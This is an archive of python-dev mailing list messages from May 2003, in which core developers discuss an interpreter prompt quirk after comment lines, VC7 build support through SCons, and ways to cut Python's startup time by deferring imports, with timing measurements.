>     "(32.5, 40000, ('spam', 'eggs'))"
> 
> It's caused by the trailing colon at the end of the comment.  I verified it
> using current CVS:
> 
>     >>> hello = 'hello, world\n' hellos = repr(hello) print hellos
>     'hello, world\n'
>     >>> # hello:
>     ...
>     >>>
> 
> Shouldn't the trailing colon be ignored in comments?  Bug, feature or wart?

It's not the trailing colon.  Any line that consists of only a comment
does this:

  >>> 
  >>> # foo
  ... 
  >>>  # foo
  ...    
  >>> 12 # foo
  12
  >>> 

And yes, it's a wart, but I don't know how to fix it.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From thomas@xs4all.net  Wed May  7 16:16:20 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Wed, 7 May 2003 17:16:20 +0200
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <16057.7793.975960.566995@grendel.zope.com>
References: <16057.5934.556547.671279@montanaro.dyndns.org> <LNBBLJKPBEHFEDALKOLCCEBHEJAB.tim.one@comcast.net> <16057.7793.975960.566995@grendel.zope.com>
Message-ID: <20030507151620.GI26254@xs4all.nl>

On Wed, May 07, 2003 at 10:55:45AM -0400, Fred L. Drake, Jr. wrote:

> Tim Peters writes:
>  > This changed at some very early point in Python's life.  I don't think the
>  > trailing colon is relevant:
>  > 
>  > >>> 1+2
>  > 3
>  > >>> # hello
>  > ...
>  > >>>

> I think this is also a point on which Python and Jython differ, but I
> don't have Jython installed anywhere nearby to test with.

I do:

debian:~ > jython
Jython 2.1 on java1.1.8 (JIT: null)
Type "copyright", "credits" or "license" for more information.
>>> 1+2
3
>>> # hello
>>> ^D

(This is why I use Debian... 'apt-get install jython' :-)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From skip@pobox.com  Wed May  7 16:16:29 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 10:16:29 -0500
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <200305071502.h47F2LK03176@pcp02138704pcs.reston01.va.comcast.net>
References: <16057.5934.556547.671279@montanaro.dyndns.org>
 <200305071502.h47F2LK03176@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <16057.9037.913362.225855@montanaro.dyndns.org>

    Guido> And yes, it's a wart, but I don't know how to fix it.

I did a little digging and noticed this comment dating from v 2.5 (Jul 91):

    /* Lines with only whitespace and/or comments
       shouldn't affect the indentation and are
       not passed to the parser as NEWLINE tokens,
       except *totally* empty lines in interactive
       mode, which signal the end of a command group. */

Not surprisingly, given the age of the change, your fingerprints are all
over it. ;-)

I suspect if the code beneath that comment was executed only when the
indentation level is zero we'd be okay, but I don't know if the tokenizer
has that sort of information available.  I'll do a little more poking
around.

Skip



From akuchlin@mems-exchange.org  Wed May  7 16:19:16 2003
From: akuchlin@mems-exchange.org (Andrew Kuchling)
Date: Wed, 07 May 2003 11:19:16 -0400
Subject: [Python-Dev] Relying on ReST in the core?
Message-ID: <E19DQhQ-0006Dt-00@ute.mems-exchange.org>

For PEP 314, it's been suggested that the Description field 
be written in RestructuredText.  This change doesn't affect the
Distutils code, because the Distutils just takes this field and 
copies it into an output file; programs using the metadata defined 
in PEP 314 would have to be able to process ReST, though.

I know the plan is to eventually add ReST/docutils to the standard
library, and that this isn't happening for Python 2.3.  Question: is
it OK to make something in the core implicitly depend on ReST before
ReST is in the core?  Until docutils is added, there's always the risk
that we decide to never add ReST to the core, or ReST 2.0 changes the
format completely, or we decide XYZ is much better, or something like
that.

--amk                                                    (www.amk.ca)
IAGO: Poor and content is rich and rich enough.
      -- _Othello_, III, iii


From guido@python.org  Wed May  7 16:32:39 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 07 May 2003 11:32:39 -0400
Subject: [Python-Dev] Relying on ReST in the core?
In-Reply-To: "Your message of Wed, 07 May 2003 11:19:16 EDT."
 <E19DQhQ-0006Dt-00@ute.mems-exchange.org>
References: <E19DQhQ-0006Dt-00@ute.mems-exchange.org>
Message-ID: <200305071532.h47FWdX03514@pcp02138704pcs.reston01.va.comcast.net>

> For PEP 314, it's been suggested that the Description field 
> be written in RestructuredText.  This change doesn't affect the
> Distutils code, because the Distutils just takes this field and 
> copies it into an output file; programs using the metadata defined 
> in PEP 314 would have to be able to process ReST, though.
> 
> I know the plan is to eventually add ReST/docutils to the standard
> library, and that this isn't happening for Python 2.3.  Question: is
> it OK to make something in the core implicitly depend on ReST before
> ReST is in the core?  Until docutils is added, there's always the risk
> that we decide to never add ReST to the core, or ReST 2.0 changes the
> format completely, or we decide XYZ is much better, or something like
> that.

I think it's okay to make this a recommendation, with the suggestion
to be conservative in using reST features.  Since a description is
usually only a paragraph long, I think that should be okay.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Wed May  7 16:33:31 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 07 May 2003 11:33:31 -0400
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: "Your message of Wed, 07 May 2003 10:16:29 CDT."
 <16057.9037.913362.225855@montanaro.dyndns.org>
References: <16057.5934.556547.671279@montanaro.dyndns.org>
 <200305071502.h47F2LK03176@pcp02138704pcs.reston01.va.comcast.net>
 <16057.9037.913362.225855@montanaro.dyndns.org>
Message-ID: <200305071533.h47FXVf03526@pcp02138704pcs.reston01.va.comcast.net>

>     Guido> And yes, it's a wart, but I don't know how to fix it.
> 
> I did a little digging and noticed this comment dating from v 2.5 (Jul 91):
> 
>     /* Lines with only whitespace and/or comments
>        shouldn't affect the indentation and are
>        not passed to the parser as NEWLINE tokens,
>        except *totally* empty lines in interactive
>        mode, which signal the end of a command group. */
> 
> Not surprisingly, given the age of the change, your fingerprints are all
> over it. ;-)
> 
> I suspect if the code beneath that comment was executed only when the
> indentation level is zero we'd be okay, but I don't know if the tokenizer
> has that sort of information available.  I'll do a little more poking
> around.

Please do.  The indentation level should be easily available, since it
is computed by the tokenizer.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Wed May  7 17:15:35 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 11:15:35 -0500
Subject: [Python-Dev] odd interpreter feature
In-Reply-To: <200305071533.h47FXVf03526@pcp02138704pcs.reston01.va.comcast.net>
References: <16057.5934.556547.671279@montanaro.dyndns.org>
 <200305071502.h47F2LK03176@pcp02138704pcs.reston01.va.comcast.net>
 <16057.9037.913362.225855@montanaro.dyndns.org>
 <200305071533.h47FXVf03526@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <16057.12583.500034.130135@montanaro.dyndns.org>

    Guido> Please do.  The indentation level should be easily available,
    Guido> since it is computed by the tokenizer.

Alas, it's more complicated than just the indentation level of the current
line.  I need to know if the previous line was indented, which I don't think
the tokenizer knows (at least examining *tok in gdb under various conditions
suggests it doesn't).

I see the following possible cases (there are perhaps more, but I think they
are similar enough to ignore here):

    >>> if x == y:
    ...   # hello
    ...   pass
    ... 
    >>> if x == y:
    ...   x = 1
    ... # hello
    ...   pass
    ... 
    >>> x = 1
    >>> # hello
    ... 
    >>> 

Only the last case should display the primary prompt after the comment is
entered.  The other two correctly display the secondary prompt.  It's
distinguishing the second and third cases in the tokenizer without help from
the parser that's the challenge.

Oh well.  Perhaps it's a wart best left alone.

Skip


From brian@sweetapp.com  Wed May  7 18:02:19 2003
From: brian@sweetapp.com (Brian Quinlan)
Date: Wed, 07 May 2003 10:02:19 -0700
Subject: [Python-Dev] Re: MS VC 7 offer
In-Reply-To: <ud6ivxbgx.fsf@boost-consulting.com>
Message-ID: <010501c314ba$6b8dbef0$21795418@dell1700>

> > That is information about the core ABI. I do need to be concerned
> > about changes in the libraries, as well, in particular about
> > incompatibilities resulting from multiple copies of the C library. 
> > You said you don't know much about that.
> 
> I can find out almost as easily, if you have specific questions.

But the actual question that we would like to answer is quite broad:
what are all of the possible compatibility problems associated with
using a VC6 compiled DLL with a VC7 compiled application?

Assuming that only changed runtime data structures are going to be a
problem, knowing which ones cannot be passed between the two versions
would be nice. Below is a list of the standard types defined by
Microsoft's VC6 runtime library (taken from the VC6 docs):

clock_t
_complex
_dev_t
div_t, ldiv_t
_exception
FILE
_finddata_t, _wfinddata_t, _wfinddatai64_t
_FPIEEE_RECORD
fpos_t
_HEAPINFO
jmp_buf
lconv
_off_t
_onexit_t
_PNH
ptrdiff_t
sig_atomic_t
size_t
_stat
time_t
_timeb
tm
_utimbuf
va_list
wchar_t
wctrans_t
wctype_t
wint_t

Cheers,
Brian 



From greg_spencer@acm.org  Wed May  7 17:58:03 2003
From: greg_spencer@acm.org (Greg Spencer)
Date: Wed, 7 May 2003 10:58:03 -0600
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB8B1E2.2050108@dmsware.com>
Message-ID: <FMELJMKFIBGPDAJJDKINEEPNDPAA.greg_spencer@acm.org>

Well, I'm almost done with the SCons integration for both VC6 and VC7.  Just
some tests to write and integration into the current codeline to do.

Paolo, I'm not sure what you mean by "full" support for VC7, but here's what
I'm working on:

1) SCons writes out and maintains (as a "product" of the build) a .dsw and
.dsw file for VC6, or an .sln and .vcproj file for VC7.

2) The project and solution files contain "External Makefile" targets, which
in MSVC means that it will launch an external command when the "build"
button is pressed.

3) The project files contain all of the sources configured in the SCons
file, and you can include as many additional files as you would like.  The
SConscript file that generated the .dsp or .vcproj file is automatically
included in the source list so you can edit it from the IDE.

With this scheme, you can browse the class hierarchy, edit resource files,
build the project, double-click on errors (if any :-), edit source files
from the IDE, launch the executable (if any) in the debugger, lather, rinse,
repeat.

The build is then completely controlled by the Python SConscripts, with the
full flexibility that offers, and the project files are now just products of
the build that will be blown away and regenerated any time they need to be
rebuilt.

The only things I've discovered that you can't do with this scheme are
insert ActiveX controls (because the menu items are disabled) and build
individual object files.

At first glance, it seems like the logical choice for VS integration is to
build a plugin to Visual Studio, but for VS6, there aren't really enough
trigger events to capture the appropriate information at the right times, so
it's not really feasible.

For VS7, I think things are much more promising in the plugin department,
but truthfully, I'm not sure there's much added value.  You could insert new
ActiveX controls with the wizard and build individual files, sure.  But do
you really want to change build settings from within the IDE's dialogs?  I
haven't really decided how this would even work.  Probably you'd need a
third configuration file that both the VS7 tool and the SConscript could
share so that they could get their build setting information.  Yet another
config file, and now you'd have to keep the .sln and .vcproj files too,
making a total of four files that control the build.  They'd be in sync, but
one file is always better than four.  Also, this only works for VS7, and
it's complex.

I'm still considering a VS7 plugin as a possible future direction, but I
need some compelling reasons to do it.  I've used the "External Makefile"
scheme with classic Cons for four years now, and I haven't had any major
complaints from anyone -- they're just overjoyed that their build is
automated and "just works", and they can still use the IDE for 90% of what
they used it for before.  Not to mention all the benefits of using a build
system like SCons (centralized setting of build parameters for all projects,
for instance).

I hope that addresses your needs.  If you have suggestions or questions,
feel free to e-mail me.

BTW, I don't subscribe to python-dev, so be sure to CC me in this thread.

				-Greg.

P.S. Thanks for creating a language that a Perl guy can learn in a week.
And I thought shifting from classic cons to scons would be hard... :-)

-----Original Message-----
From: Paolo Invernizzi [mailto:paoloinvernizzi@dmsware.com]
Sent: Wednesday, May 07, 2003 1:13 AM
To: python-dev@python.org
Cc: Mark Hammond; greg_spencer@acm.org
Subject: Re: [Python-Dev] MS VC 7 offer


Mark Hammond wrote:

>Another thing to consider is the "make" environment.  If we don't use
>DevStudio, then presumably our existing project files will become useless.
>Not a huge problem, but a real one.  MSVC exported makefiles are not
>designed to be maintained.  I'm having good success with autoconf and
Python
>on other projects, but that would raise the barrier to including cygwin in
>your build environment.
>
I think the scons (www.scons.org) will have in its next release full
support for building targets using VC6 *project* file, and full support
for VC7.
Actually it has support also for cygwin and mingw...

So I think is possible to have an automated way for building VC7 python
based only on some scons script and VC6 project files...
The possible goal is to keep working with VC6 IDE as now, and have a
simple build script able to automatically build the VC7 version tracking
changes..

I've inserted Greg Spencer, who I know is working on this... surely he
can bring us more details.


---
Paolo Invernizzi.






From jepler@unpythonic.net  Wed May  7 18:06:18 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Wed, 7 May 2003 12:06:18 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <m38ytk7zbn.fsf@mira.informatik.hu-berlin.de>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <m38ytk7zbn.fsf@mira.informatik.hu-berlin.de>
Message-ID: <20030507170618.GI27125@unpythonic.net>

On Tue, May 06, 2003 at 07:35:40PM +0200, Martin v. L=F6wis wrote:
> That would be easy to determine: Just disable the block
>=20
> #if defined(Py_USING_UNICODE) && defined(HAVE_LANGINFO_H) && defined(CO=
DESET)
>=20
> in pythonrun.c, and see whether it changes anything. To my knowledge,
> this is the only cause of loading encodings during startup on Unix.

With this change, I typically see
real    0m0.020s
user    0m0.020s
sys     0m0.000s
instead of
real    0m0.022s
user    0m0.020s
sys     0m0.000s

The number of successful open()s decreases, but not by much:
# before change
$ strace -e open ./python-2.3 -S -c pass 2>&1 | grep -v ENOENT | wc -l
     46
# after change
$ strace -e open ./python -S -c pass 2>&1 | grep -v ENOENT | wc -l
     39

What about this line?  It seems to be the cause of a bunch of imports,
including the sre stuff:
    /* pythonrun.c */
        PyModule_WarningsModule =3D PyImport_ImportModule("warnings");

Jeff


From patmiller@llnl.gov  Wed May  7 18:25:57 2003
From: patmiller@llnl.gov (Pat Miller)
Date: Wed, 07 May 2003 10:25:57 -0700
Subject: [Python-Dev] odd interpreter feature
Message-ID: <3EB941A5.5070003@llnl.gov>

Skip writes:


>    >>> # hello:
>    ...
>    >>>
> 
> Shouldn't the trailing colon be ignored in comments?  Bug, feature or wart?

I figured it was a feature...  Taking the view that any source block asks
for continuations seemed natural, so I assumed Guido intended it that way ;-)

If the comments were active objects (like doc strings), then it would
be the desired association.
 >>> # About to do something tricky
... tricky()
 >>>


Pat

-- 
Patrick Miller | (925) 423-0309 | http://www.llnl.gov/CASC/people/pmiller

All you need in this life is ignorance and confidence, and then success is
sure. -- Mark Twain



From martin@v.loewis.de  Wed May  7 18:48:41 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 07 May 2003 19:48:41 +0200
Subject: [Python-Dev] bsddb185 module changes checked in
In-Reply-To: <085D82A5-808D-11D7-A6E2-0030655234CE@cwi.nl>
References: <085D82A5-808D-11D7-A6E2-0030655234CE@cwi.nl>
Message-ID: <m3of2e1wcm.fsf@mira.informatik.hu-berlin.de>

Jack Jansen <Jack.Jansen@cwi.nl> writes:

> On SGI Irix 6.5 (MIPSpro Compilers: Version 7.2.1) it tries to build
> it, and fails. It complains about "u_int" and such not being
> defined. There's magic at the top of /usr/include/db.h for defining
> various types optionally, and that's as far as my understanding
> went.

I would not be worried about that too much. An Irix user who cares
about that will propose a solution, if there are Irix users who care
about that.

Regards,
Martin



From greg_spencer@acm.org  Wed May  7 19:25:11 2003
From: greg_spencer@acm.org (Greg Spencer)
Date: Wed, 7 May 2003 12:25:11 -0600
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EB8B1E2.2050108@dmsware.com>
Message-ID: <FMELJMKFIBGPDAJJDKINAEPODPAA.greg_spencer@acm.org>

Actually, on re-reading your mail, I realize that you might just be talking
about getting VC7 to work well with SCons (since it currently only knows
about how to find VC6).   I've got that part done, and it'll be in with the
project file stuff.

				-Greg.

-----Original Message-----
From: Paolo Invernizzi [mailto:paoloinvernizzi@dmsware.com]
Sent: Wednesday, May 07, 2003 1:13 AM
To: python-dev@python.org
Cc: Mark Hammond; greg_spencer@acm.org
Subject: Re: [Python-Dev] MS VC 7 offer


Mark Hammond wrote:

>Another thing to consider is the "make" environment.  If we don't use
>DevStudio, then presumably our existing project files will become useless.
>Not a huge problem, but a real one.  MSVC exported makefiles are not
>designed to be maintained.  I'm having good success with autoconf and
Python
>on other projects, but that would raise the barrier to including cygwin in
>your build environment.
>
I think the scons (www.scons.org) will have in its next release full
support for building targets using VC6 *project* file, and full support
for VC7.
Actually it has support also for cygwin and mingw...

So I think is possible to have an automated way for building VC7 python
based only on some scons script and VC6 project files...
The possible goal is to keep working with VC6 IDE as now, and have a
simple build script able to automatically build the VC7 version tracking
changes..

I've inserted Greg Spencer, who I know is working on this... surely he
can bring us more details.


---
Paolo Invernizzi.






From jepler@unpythonic.net  Wed May  7 19:30:26 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Wed, 7 May 2003 13:30:26 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <20030507170618.GI27125@unpythonic.net>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <m38ytk7zbn.fsf@mira.informatik.hu-berlin.de> <20030507170618.GI27125@unpythonic.net>
Message-ID: <20030507183025.GJ27125@unpythonic.net>

On Wed, May 07, 2003 at 12:06:18PM -0500, Jeff Epler wrote:
> What about this line?  It seems to be the cause of a bunch of imports,
> including the sre stuff:
>     /* pythonrun.c */
>         PyModule_WarningsModule = PyImport_ImportModule("warnings");

With this *and* the unicode stuff removed, I see runtimes like this:
$ time ./python -S -c pass
real    0m0.008s
user    0m0.010s
sys     0m0.000s

and opens are nearly down to 2.2 levels:
$ strace -e open ./python -S -c pass 2>&1 | grep -v ENOENT | wc
     11      44     489
$ strace -e open /usr/bin/python -S -c pass 2>&1 | grep -v ENOENT | wc
      8      32     355
(the differences are libstdc++, libgcc_s, and librt)

With *just* the import of warnings removed, I get this:
$ time ./python -S -c pass
real    0m0.017s
user    0m0.010s
sys     0m0.010s
.. and the input of sre is back.  I guess it's used in both warnings.py
and encodings/__init__.py

Jeff


From jepler@unpythonic.net  Wed May  7 19:52:46 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Wed, 7 May 2003 13:52:46 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <20030507183025.GJ27125@unpythonic.net>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <m38ytk7zbn.fsf@mira.informatik.hu-berlin.de> <20030507170618.GI27125@unpythonic.net> <20030507183025.GJ27125@unpythonic.net>
Message-ID: <20030507185245.GL27125@unpythonic.net>

On Wed, May 07, 2003 at 01:30:26PM -0500, Jeff Epler wrote:
> .. and the input of sre is back.  I guess it's used in both warnings.py
> and encodings/__init__.py

In encodings.__init__.py, the only use of re is for the
normalize_encoding function.  It could potentially be replaced with only
string operations:
    # translate all offending characters to whitespace
    _norm_encoding_trans = string.maketrans(...)

    def normalize_encoding(encoding):
        encoding = encoding.translate(_norm_encoding_trans)
        # let the str.split machinery take care of splitting
        # only once on repeated whitespace
        return "_".join(encoding.split())
.. or the import of re could be moved inside normalize_encoding.

In warnings.py, re is used in two functions, filterwarnings() and
_setoption().  it's probably safe to move 'import re' inside these
functions. I'm guessing the 'import lock' warnings.py problem doesn't
apply when parsing options or adding new warning filters.

Furthermore, filterwarnings() will have to be changed to not use
re.compile() when message is "" (the resulting RE is always successfully
matched) since several filterwarnings() calls are already performed by
default, but always with message="".

These changes would prevent the import of 're' at startup time, which
appears to be the real killer. (see my module import timings in an
earlier message)


From skip@pobox.com  Wed May  7 20:05:06 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 14:05:06 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <20030507185245.GL27125@unpythonic.net>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
 <m38ytk7zbn.fsf@mira.informatik.hu-berlin.de>
 <20030507170618.GI27125@unpythonic.net>
 <20030507183025.GJ27125@unpythonic.net>
 <20030507185245.GL27125@unpythonic.net>
Message-ID: <16057.22754.582272.377803@montanaro.dyndns.org>

    Jeff> In encodings.__init__.py, the only use of re is for the
    Jeff> normalize_encoding function.  It could potentially be replaced with only
    Jeff> string operations:
    ...
    Jeff> .. or the import of re could be moved inside normalize_encoding.

I don't know if this still holds true, but at one point during the 2.x
series I think it was pretty expensive to perform imports inside functions,
much more expensive than in 1.5.2 at least (maybe right after nested scopes
were introduced?).  If that is still true, moving the import might be false
economy.

Skip

"Some people, when confronted with a problem, think 'I know, I'll use regular
expressions.'  Now they have two problems." -- Jamie Zawinski



From jepler@unpythonic.net  Wed May  7 20:42:17 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Wed, 7 May 2003 14:42:17 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <16057.22754.582272.377803@montanaro.dyndns.org>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <m38ytk7zbn.fsf@mira.informatik.hu-berlin.de> <20030507170618.GI27125@unpythonic.net> <20030507183025.GJ27125@unpythonic.net> <20030507185245.GL27125@unpythonic.net> <16057.22754.582272.377803@montanaro.dyndns.org>
Message-ID: <20030507194215.GM27125@unpythonic.net>

On Wed, May 07, 2003 at 02:05:06PM -0500, Skip Montanaro wrote:
> I don't know if this still holds true, but at one point during the 2.x
> series I think it was pretty expensive to perform imports inside functions,
> much more expensive than in 1.5.2 at least (maybe right after nested scopes
> were introduced?).  If that is still true, moving the import might be false
> economy.

$ ./python Lib/timeit.py -s "def f(): import sys" "f()"
100000 loops, best of 3: 3.34 usec per loop
$ ./python Lib/timeit.py -s "def f(): pass" "import sys; f()"
100000 loops, best of 3: 3.3 usec per loop
$ ./python Lib/timeit.py -s "def f(): pass" "f()"
1000000 loops, best of 3: 0.451 usec per loop
$ ./python Lib/timeit.py 'import sys'
100000 loops, best of 3: 2.88 usec per loop

About 2.8usec would be added to each invocation of the functions in
question, about the same as the cost of a global-scope import.  This
means that you lose overall as soon as the function is called twice.

.. but this was about speeding python startup, not just speeding python.
<.0375 wink>

Jeff


From aleax@aleax.it  Wed May  7 21:57:26 2003
From: aleax@aleax.it (Alex Martelli)
Date: Wed, 7 May 2003 22:57:26 +0200
Subject: [Python-Dev] Startup time
In-Reply-To: <16057.22754.582272.377803@montanaro.dyndns.org>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <20030507185245.GL27125@unpythonic.net> <16057.22754.582272.377803@montanaro.dyndns.org>
Message-ID: <200305072257.26085.aleax@aleax.it>

On Wednesday 07 May 2003 09:05 pm, Skip Montanaro wrote:
>     Jeff> In encodings.__init__.py, the only use of re is for the
>     Jeff> normalize_encoding function.  It could potentially be replaced
> with only Jeff> string operations:
>     ...
>     Jeff> .. or the import of re could be moved inside normalize_encoding.
>
> I don't know if this still holds true, but at one point during the 2.x
> series I think it was pretty expensive to perform imports inside functions,
> much more expensive than in 1.5.2 at least (maybe right after nested scopes
> were introduced?).  If that is still true, moving the import might be false
> economy.

Doesn't seem to be true in 2.3, if I understand what you're saying:

[alex@lancelot src]$ python Lib/timeit.py -s'def f(): pass' 'import math; f()'
100000 loops, best of 3: 4.04 usec per loop

[alex@lancelot src]$ python Lib/timeit.py -s'def f(): import math' 'pass; f()'
100000 loops, best of 3: 4.05 usec per loop

or even

[alex@lancelot src]$ python Lib/timeit.py -s'import math' -s'def f(): pass' 
'reload(math); f()'
10000 loops, best of 3: 168 usec per loop

[alex@lancelot src]$ python Lib/timeit.py -s'import math' -s'def f(): 
reload(math)' 'pass; f()'
10000 loops, best of 3: 169 usec per loop


Alex



From skip@pobox.com  Wed May  7 22:16:28 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 7 May 2003 16:16:28 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <200305072257.26085.aleax@aleax.it>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>
 <20030507185245.GL27125@unpythonic.net>
 <16057.22754.582272.377803@montanaro.dyndns.org>
 <200305072257.26085.aleax@aleax.it>
Message-ID: <16057.30636.403064.675001@montanaro.dyndns.org>

    >> I don't know if this still holds true, but at one point during the
    >> 2.x series I think it was pretty expensive to perform imports inside
    >> functions, much more expensive than in 1.5.2 at least (maybe right
    >> after nested scopes were introduced?).

    Alex> Doesn't seem to be true in 2.3, if I understand what you're saying:

    Alex> [alex@lancelot src]$ python Lib/timeit.py -s'def f(): pass' 'import math; f()'
    Alex> 100000 loops, best of 3: 4.04 usec per loop

    Alex> [alex@lancelot src]$ python Lib/timeit.py -s'def f(): import math' 'pass; f()'
    Alex> 100000 loops, best of 3: 4.05 usec per loop

Yes, you're correct.  Guess I could have run that myself had I been
thinking.  (My sleeping cap wasn't on much last night, so my thinking cap
hasn't been on much today.)

Guido, any chance you can quickly run the above two through the thirty-leven
versions of Python you have laying about so we can narrow this down or
refute my faulty memory?  I've seen some recent posts by you which had
performance data as far back as 1.3.  I tried with 2.1, 2.2 and CVS but saw
no discernable differences within versions:

    % python ~/local/bin/timeit.py -s'def f(): pass' 'import math; f()'
    100000 loops, best of 3: 7.44 usec per loop
    % python ~/local/bin/timeit.py -s'def f(): import math' 'f()'
    100000 loops, best of 3: 7.6 usec per loop

    % python2.2 ~/local/bin/timeit.py -s'def f(): pass' 'import math; f()'
    100000 loops, best of 3: 9.19 usec per loop
    % python2.2 ~/local/bin/timeit.py -s'def f(): import math' 'f()'
    100000 loops, best of 3: 9.05 usec per loop

    % python2.1 ~/local/bin/timeit.py -s'def f(): pass' 'import math; f()'
    100000 loops, best of 3: 9.16 usec per loop
    % python2.1 ~/local/bin/timeit.py -s'def f(): import math' 'f()'
    100000 loops, best of 3: 9.12 usec per loop

Maybe it was 2.0?

Thx,

Skip


From drifty@alum.berkeley.edu  Wed May  7 23:16:50 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Wed, 7 May 2003 15:16:50 -0700 (PDT)
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
Message-ID: <Pine.SOL.4.55.0305071511430.11630@death.OCF.Berkeley.EDU>

Someone filed a bug report wanting it to be mentioned that most libc
implementations  of strptime don't handle %Z.  Michael asked whether
_strptime was going to become the permanent version of time.strptime or
not.  This was partially discussed back when Guido used his amazing time
machine to make time.strptime use _strptime exclusively for testing
purposes.

I vaguely remember Tim saying he supported moving to _strptime, but I
don't remember Guido having an opinion.  If this is going to happen for
2.3 I would like to know so as to fix the documentation to be better.

-Brett


From python@rcn.com  Thu May  8 00:55:03 2003
From: python@rcn.com (Raymond Hettinger)
Date: Wed, 7 May 2003 19:55:03 -0400
Subject: [Python-Dev] Startup time
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net>        <20030507185245.GL27125@unpythonic.net>        <16057.22754.582272.377803@montanaro.dyndns.org>        <200305072257.26085.aleax@aleax.it> <16057.30636.403064.675001@montanaro.dyndns.org>
Message-ID: <003e01c314f4$1414f780$125ffea9@oemcomputer>

> Guido, any chance you can quickly run the above two through the thirty-leven
> versions of Python you have laying about so we can narrow this down or
> refute my faulty memory?  I've seen some recent posts by you which had
> performance data as far back as 1.3.  I tried with 2.1, 2.2 and CVS but saw
> no discernable differences within versions:
> 
>     % python ~/local/bin/timeit.py -s'def f(): pass' 'import math; f()'
>     100000 loops, best of 3: 7.44 usec per loop
>     % python ~/local/bin/timeit.py -s'def f(): import math' 'f()'
>     100000 loops, best of 3: 7.6 usec per loop
> 
>     % python2.2 ~/local/bin/timeit.py -s'def f(): pass' 'import math; f()'
>     100000 loops, best of 3: 9.19 usec per loop
>     % python2.2 ~/local/bin/timeit.py -s'def f(): import math' 'f()'
>     100000 loops, best of 3: 9.05 usec per loop
> 
>     % python2.1 ~/local/bin/timeit.py -s'def f(): pass' 'import math; f()'
>     100000 loops, best of 3: 9.16 usec per loop
>     % python2.1 ~/local/bin/timeit.py -s'def f(): import math' 'f()'
>     100000 loops, best of 3: 9.12 usec per loop

I don't think timeit.py helps here.  It works by substituting *both* 
the setup and statement inside a compiled function.  

So, *none* of the above timings show the effect of a top level import 
versus one that is inside a function.  It does compare 1 deep nesting 
to 2 levels deep.

So, you'll likely have to roll your own minature timer if you want
a straight answer.


Raymond Hettinger


From jepler@unpythonic.net  Thu May  8 01:53:44 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Wed, 7 May 2003 19:53:44 -0500
Subject: [Python-Dev] Startup time
In-Reply-To: <003e01c314f4$1414f780$125ffea9@oemcomputer>
References: <200305061207.h46C7sj26462@pcp02138704pcs.reston01.va.comcast.net> <20030507185245.GL27125@unpythonic.net> <16057.22754.582272.377803@montanaro.dyndns.org> <200305072257.26085.aleax@aleax.it> <16057.30636.403064.675001@montanaro.dyndns.org> <003e01c314f4$1414f780$125ffea9@oemcomputer>
Message-ID: <20030508005342.GA3634@unpythonic.net>

On Wed, May 07, 2003 at 07:55:03PM -0400, Raymond Hettinger wrote:
> I don't think timeit.py helps here.  It works by substituting *both* 
> the setup and statement inside a compiled function.  
> 
> So, *none* of the above timings show the effect of a top level import 
> versus one that is inside a function.  It does compare 1 deep nesting 
> to 2 levels deep.

This program prints clock() times for 4e6 imports, first at global and then
at function scope.  Function scope wins a little bit, possibly due to the
speed of STORE_FAST instead of STORE_GLOBAL (or would it be STORE_NAME?)

########################################################################
# (on a different machine than my earlier timeit results, running 2.2.2)
# time for global import 30.21
# time for function import 27.31

import time, sys

t0 = time.clock()
for i in range(1e6):
	import sys; import sys; import sys; import sys;
t1 = time.clock()

print "time for global import", t1-t0

def f():
	for i in range(1e6):
		import sys; import sys; import sys; import sys;

t0 = time.clock()
f()
t1 = time.clock()
print "time for function import", t1-t0
########################################################################

If Skip is thinking of a slowdown for import and function scope, could it
be the {LOAD,STORE}_FAST performance killer 'import *'? (wow, LOAD_NAME
isn't as much slower than LOAD_FAST as you might expect..)

########################################################################
# time for <function f at 0x816306c> 27.9
# time for <function g at 0x8159e9c> 37.94

import new, sys, time
m = new.module('m')
sys.modules['m'] = m
m.__dict__.update({'__all__': ['x'], 'x': None})

def f():
        from m import x
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x
	x; x; x; x; x; x; x; x; x; x

def g():
